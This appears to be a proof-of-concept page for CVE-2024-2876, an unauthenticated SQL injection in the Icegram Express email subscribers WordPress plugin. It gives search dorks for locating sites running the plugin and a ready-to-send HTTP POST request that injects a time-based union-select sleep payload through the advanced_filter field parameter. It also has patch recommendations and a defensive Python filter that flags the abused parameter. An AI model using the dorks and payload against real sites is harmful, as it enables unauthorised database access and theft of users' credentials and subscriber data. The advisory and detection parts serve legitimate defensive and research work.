CVE-2024-2876 PoC — Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injecti

Associated Vulnerability
Title: Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injection (CVE-2024-2876)
Description: The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Readme
# CVE-2024-2876 - SQL Injection Vulnerability in Email Subscribers by Icegram Express

## Overview

CVE-2024-2876 is a critical security vulnerability found in the "Email Subscribers by Icegram Express" plugin for WordPress. This vulnerability affects versions up to and including 5.7.14 and poses significant risks to over 90,000 websites.

### Vulnerability Details

- **CVE-ID**: CVE-2024-2876
- **CVSS Score**: 9.8 (Critical)
- **Affected Versions**: Up to and including 5.7.14
- **Patched Version**: 5.7.15 and above

### Description

The vulnerability is a SQL injection flaw that allows unauthenticated attackers to execute malicious SQL queries on the affected WordPress databases. By manipulating user inputs that are not properly sanitized, attackers can extract sensitive information such as usernames, email addresses, password hashes, and subscriber lists.

### Exploit Mechanism

The SQL injection occurs within the `run` function of the plugin's `IG_ES_Subscribers_Query` class. A user-supplied parameter is insufficiently escaped and the existing SQL query is not sufficiently prepared, so an unauthenticated request can append additional SQL to it. This compromises the integrity and confidentiality of the data stored in the WordPress database.


## Dorks CVE-2024-2876

- FOFA : body="/wp-content/plugins/email-subscribers/"

- publicwww : "/wp-content/plugins/email-subscribers/"

## POC CVE-2024-2876

```http
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```

## Recommendations

1. **Immediate Update**: If you are using the "Email Subscribers by Icegram Express" plugin, upgrade to version 5.7.15 or later immediately to apply the security fix.
   
2. **Regular Audits**: Regularly review and update all WordPress plugins and themes to their latest versions to ensure security.
   
3. **Security Plugins**: Use reputable WordPress security plugins to enhance defenses against SQL injection and other cyber threats.
   
4. **Strong Password Policies**: Implement strong and unique passwords for all accounts related to your WordPress site to reduce unauthorized access risks.
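
For sites that cannot be upgraded immediately, a request filter can flag the parameter the PoC request above abuses. The following is an added example, not part of the original README or the plugin's code; the function name, the sample requests and the rule that a legitimate `field` value is a bare identifier are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Endpoint and parameter shape taken from the PoC request on this page.
TARGET_PATH = "/wp-admin/admin-post.php"
FIELD_KEY = re.compile(r"advanced_filter\[conditions\]\[\d+\]\[\d+\]\[field\]")
# Assumption: a legitimate filter field is a bare identifier such as "status".
SAFE_FIELD = re.compile(r"[A-Za-z0-9_]{1,64}")


def suspicious_fields(method: str, path: str, body: str) -> list[tuple[str, str]]:
    """Return (key, value) pairs whose filter field is not a bare identifier."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return []
    hits = []
    # parse_qsl percent-decodes keys and values and splits each pair on the
    # first '=', so an '=' smuggled into the value stays part of the value
    # and encoded brackets (%5B, %5D) cannot hide the parameter name.
    for key, value in parse_qsl(body, keep_blank_values=True):
        if FIELD_KEY.fullmatch(key) and not SAFE_FIELD.fullmatch(value):
            hits.append((key, value))
    return hits


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    # Plain identifier in the field slot: allowed.
    ("POST", TARGET_PATH,
     "page=es_subscribers&advanced_filter[conditions][0][0][field]=status"
     "&advanced_filter[conditions][0][0][operator]=="
     "&advanced_filter[conditions][0][0][value]=1"),
    # Percent-encoded key with SQL punctuation in the field slot: flagged.
    ("POST", TARGET_PATH,
     "page=es_subscribers"
     "&advanced_filter%5Bconditions%5D%5B0%5D%5B0%5D%5Bfield%5D=status=1)))--+"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(path, suspicious_fields(method, path, body) or "ok")
```

The same allowlist can be enforced at a reverse proxy or WAF in front of WordPress; upgrading to 5.7.15 or later remains the actual fix.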

## Impact of Non-Compliance

Failing to update the affected plugin can leave websites vulnerable to data breaches and unauthorized access. Given the widespread use of this plugin, immediate action is crucial to secure installations.

File Snapshot

[4.0K] /data/pocs/9fda6460dd14956eac2d795c85a6c0c4a4ffd003
├── [ 842] CVE-2024-2876.yaml
└── [2.5K] README.md

0 directories, 2 files